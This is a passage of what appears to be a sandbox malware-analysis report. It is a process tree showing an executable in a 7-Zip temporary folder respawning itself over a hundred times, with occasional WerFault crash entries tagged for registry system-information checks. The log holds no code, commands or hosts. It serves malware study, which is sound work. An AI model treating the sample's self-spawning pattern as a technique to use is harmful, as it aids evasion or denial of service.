      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6192
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6544
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2640
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4728
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1764
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1532
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6656
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6448
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5252
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5640
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1560
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6044
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7032
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5436
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3368
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1380
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6412
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5888
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5888 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:988
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3216
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6148
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5856
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1100
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3056
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1248
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3996
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2604
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6768
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4468
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1020
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1160
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6300
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5628
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1340
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5632
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1684
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3300
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6664
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6496
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2400
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5496
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6124
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6724
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4784
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2308
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5900
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6296
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5680
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4060
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2004
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6460
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6372
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1412
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6600
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6660
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2628
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3516
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1768
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2140
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1988
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6012
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4648
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6172
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5124
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3956
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1440
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2996
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2012
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6608
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3024
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5260
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1932
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4132
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1888
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5672
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2284
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5396
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6328
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5804
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5124
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6700
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:1168
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2300
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6496
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5728
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3060
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3392
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:476
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:712
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2336
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2176
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1492
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5712
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3200
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5056
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6976
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:420
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6900
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3972
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3424
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4584
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4864
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2624
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4636
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6944
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2540
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5400
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3200
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5664
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5160
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6688
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:676
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4756
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6444
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4124
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6652
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3104
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7140
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1908
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5384
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:980
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3148
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
